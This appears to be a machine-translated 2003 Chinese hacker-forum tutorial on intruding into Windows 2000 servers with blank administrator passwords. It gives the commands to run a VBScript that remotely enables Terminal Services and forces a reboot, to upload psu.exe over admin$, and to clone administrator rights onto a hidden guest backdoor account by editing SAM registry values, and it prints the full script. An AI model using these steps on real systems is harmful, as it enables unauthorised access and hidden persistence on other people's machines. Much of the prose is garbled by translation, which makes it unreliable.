Simple 3,389 invasions processes |http://www.cshu.net




                               About us 
                               Commercial cooperation 
                               Copyright declaration 
                               Contacts with us 



            Returns to the home pageArticle browsingOther columnsLands the forum


            |   The absolute &#21019;   |   |   hacker file   |   |   is newest 
            dynamically   |   
                  |  Hacker file>>invasion analysis>> simple 3,389 invasions 
                  processes  Printing

            Simple 3,389 invasions processes
            Www.cshu.net  2003-3-1  fog rain village 

              I on-line saw are very many how very teaches you how to invade and 
              so on the article, I thought regarding the vegetable bird said 
              radically is cannot understand! 
              Thereupon, I emit an idea! Wants to write the Jan simple point, 
              suits the vegetable bird's article! Learns me says ~ with 
              everybody!
              Must invade, I suggested you get down in the win2000 environment * 
              do!
              First, must invade, you must have the tool! I recommend several 
              section software to everybody, also is the thing which I 
              continuously uses!
              Scanning X-Scan V2.3, WINNTAutoAttack, time!
              X-Scan I very little have recently used, basically uses all was 
              WINNTAutoAttack, certainly, the young banyan tree's time I also 
              pass through commonly used!
              Long-distance opened the terminal to need a script to be allowed, 
              the code please looked at two buildings! The preservation 
              (preserves for * vbe me is rots.vbe)
              The clone account used psu to be allowed ~!
              OK, for instance scanned to have the NT weak password the server, 
              the IP address is 120.0.0.1, the manager account was 
              administrator, the password for is spatial
              Moves CMD (2,000 DOS), we open the terminal to it!
              Orders as follows!
              Cscript rots.vbe 120.0.0.1 administrator "" 3,389 /fr
              The above order should be allowed to understand? Cscript rots.vbe 
              this is the order, behind is IP, then is the manager account, 
              meets this is the password, because 120.0.0.1 this servers manager 
              passwords are spatial, that uses the double quote expression for 
              to be spatial, again behind is the port, you may wilfully 
              establish the terminal the port, /fr are open the order (to force 
              again to open again, generally I all use this, you also may /r, 
              this is Pu shower opens)
              Because the terminal server only (including server) only then has 
              above the win2000 server edition, PRO certainly is not good, this 
              edition may examine the server the edition, if is PRO prompts you 
              to withdraw from the installment!
              All is smooth, has been able to be allowed to connect the 
              terminal, we may ping it, look whether opens again, ping 120.0.0.1 
              -t
              After the installment with connects the tool to connect the 
              terminal! Now we clone the account, ha-ha, in order to will 
              facilitate to later!
              Returns to under DOS! We establish the IP connection!
              Net use \\120.0.0.1\ip "" /user: "administrator"
              This orders me to want to be supposed to be allowed to understand! 
              After the order completes, we pass to under the goal machine 
              winnt\system32 table of contents psu on!
              Copy psu.exe \\120.0.0.1\admin$\system32
              After on the biography finished, starts to make the back door 
              account in the meat chicken! Looks at the meat chicken!
              The supposition guest user is durable, we are must make the back 
              door account using guest!
              Moves CMD in this server, inputs under the order line
              Psu -p regedit -i PID
              Here explained, behind PID is the system advancement winlogon 
              value, we under the duty fence the mouse right key, look at the 
              task management!
              Looked the advancement option card, found winlogon the 
              advancement, the behind value is the winlogon pid value, the 
              supposition is 5,458
              Then, the order is this
              Psu -p regedit -i 5,458
              Like this directly opens the registration table, may read takes 
              local sam the information.
              Opens key value HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users
              Under was the local user information! We must do are guest which 
              is durable clone the manager jurisdiction the account!
              HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names
              Examined administrator the type, is if4, again looked guest is if5
              Good, after had known the type, opens
              HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4
              Right flank this value, double-clicks F, duplicates the inside at 
              sixes and sevens character, then opens
              HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F5
              Right flank double-clicks F, just duplicated glues inside!
              Has completed after, 
              HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F5
              With HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\Guest
              These two keys value derives, after derives that two keys value 
              deletion! Then inducts again! Closure registration table.
              Opens CMD, inputs under the order line
              Net user guest password
              This order is for the guest establishment password, behind 
              password is a password
              Then input
              Net user guest /active:y
              This order activates the guest account, then we are durable him
              Net user guest /active:n
              The above three lines of orders must carry out under DOS!
              OK, has opened the computer management, looks at the user, you 
              looked, the guest account or ~ which is durable! Ha ha, but it 
              already had the manager jurisdiction!
              Moreover certainly did not demonstrate in the manager group, but 
              also may land the terminal, with administrator account same!
              Cancels, lands with guest!
              The typing all hit tired ~`! Is not really easy! Ha-ha above ~` 
              hope everybody can understand!
              If also has place not clear, may ask me, I know certainly tell 
              everybody!
              Because myself also am the vegetable bird level, met a thing not 
              to know how well, ha-ha ~`! If where has not not rightly, but also 
              asks the master to direct ~!
              ----------------------------------------------------------------------
              Below is opens the terminal the script, saves it for * vbe
              On error resume next
              Set outstreem=wscript.stdout
              Set instreem=wscript.stdin
              If (lcase (right (wscript.fullname,11)) = "wscript.exe") then
              Set objShell=wscript.createObject ("wscript.shell")
              ObjShell.Run ("cmd.exe /k cscript //nologo" &chr (34) 
              &wscript.scriptfullname&chr (34))
              Wscript.quit
              End if
              If wscript.arguments.count<3 then
              Usage ()
              Wscript.echo "Not enough parameters."
              Wscript.quit
              End if
              Ipaddress=wscript.arguments (0)
              Username=wscript.arguments (1)
              Password=wscript.arguments (2)
              If wscript.arguments.count>3 then
              Port=wscript.arguments (3)
              Else
              Port=3389
              End if
              If not isnumeric (port) or port<1 or port>65000 then
              Wscript.echo "The number of port is error."
              Wscript.quit
              End if
              If wscript.arguments.count>4 then
              Reboot=wscript.arguments (4)
              Else
              Reboot= ""
              End if
              Usage ()
              Outstreem.write "Conneting" &ipaddress& "...."
              Set objlocator=createobject ("wbemscripting.swbemlocator")
              Set objswbemservices=objlocator.connectserver (ipaddress, 
              "root/cimv2", username, password)
              Showerror (err.number)
              Objswbemservices.security_ privileges.add 23, true
              Objswbemservices.security_ privileges.add 18, true
              Outstreem.write "Checking OS type...."
              Set colinstoscaption=objswbemservices.execquery ("select caption 
              from win32_operatingsystem")
              For each objinstoscaption in colinstoscaption
              If instr (objinstoscaption.caption, "Server") >0 then
              Wscript.echo "OK!"
              Else
              Wscript.echo "OS type is" &objinstoscaption.caption
              Outstreem.write "Do you want to cancel setup? [ y/n ] "
              Strcancel=instreem.readline
              If lcase (strcancel) "n" then wscript.quit
              End if
              Next
              Outstreem.write "Writing into registry...."
              Set objinstreg=objlocator.connectserver (ipaddress, 
              "root/default", username, password) get ("stdregprov")
              HKLM=&h80000002
              HKU=&h80000003
              With objinstreg
              Createkey, "SOFTWARE\Microsoft\Windows\CurrentVersion\netcache"
              Setdwordvalue HKLM, 
              "SOFTWARE\Microsoft\Windows\CurrentVersion\netcache", "Enabled",0
              Createkey HKLM, "SOFTWARE\Policies\Microsoft\Windows\Installer"
              Setdwordvalue HKLM, 
              "SOFTWARE\Policies\Microsoft\Windows\Installer", 
              "EnableAdminTSRemote",1
              Setdwordvalue HKLM, "SYSTEM\CurrentControlSet\Control\Terminal 
              Server", "TSEnabled",1
              Setdwordvalue HKLM, "SYSTEM\CurrentControlSet\Services\TermDD", 
              "Start",2
              Setdwordvalue HKLM, 
              "SYSTEM\CurrentControlSet\Services\TermService", "Start",2
              Setstringvalue HKU, "DEFAULT\Keyboard Layout\Toggle", "Hotkey", 
"1"
              Setdwordvalue HKLM, "SYSTEM\CurrentControlSet\Control\Terminal 
              Server\WinStations\RDP-Tcp", "PortNumber", port
              End with
              Showerror (err.number)
              Rebt=lcase (reboot)
              Flag=0
              If rebt= "/r" or rebt= "-r" or rebt= "\r" then flag=2
              If rebt= "/fr" or rebt= "-fr" or rebt= "\fr" then flag=6
              If flag0 then
              Outstreem.write "Now, reboot target...."
              Strwqlquery= "select * from win32_operatingsystem where 
              primary='true'"
              Set colinstances=objswbemservices.execquery (strwqlquery)
              For each objinstance in colinstances
              Objinstance.win32shutdown (flag)
              Next
              Showerror (err.number)
              Else
              Wscript.echo "You need to reboot target." Vbcrlf& "Then,"
              End if
              Wscript.echo "You can logon terminal services on" &port& "later. 
              Good luck!"
              Function showerror (errornumber)
              If errornumber Then
              Wscript.echo "Error 0x" &cstr (hex (err.number)) & "."
              If err.description "" then
              Wscript.echo "Error description: "&err.description&"."
              End if
              Wscript.quit
              Else
              Wscript.echo "OK!"
              End if
              End function
              Function usage ()
              Wscript.echo string (79, "*")
              Wscript.echo "ROTS v1.05"
              Wscript.echo "Remote Open Terminal services Script, by grass wise"
              Wscript.echo "Welcome to visite www.5458.net"
              Wscript.echo "Usage:"
              Wscript.echo "cscript" &wscript.scriptfullname& "targetIP username 
              password [ port ] [ /r|/fr ]"
              Wscript.echo "port: Default number is 3389. "
              Wscript.echo "/r: Auto reboot target. "
              Wscript.echo "/fr: Auto force reboot target. "
              Wscript.echo string (79, "*") &vbcrlf
              End function


              Original author: China wants the net technology forum -- grass to 
              be wise 
              Origin: China wants the net technology forum -- grass to be wise 
              Altogether has 535 readers to read this article 

              [Tells friend] 
            Previous article:To opens 3389 from ip to serve to 3,389 for you 

            Next article:Plays hide-and-seek -- the manual hideaway document 10 
            tunes with the intruder 

            - this week popular article - related article 
            Simple 3,389 invasions processes



      CSHU 
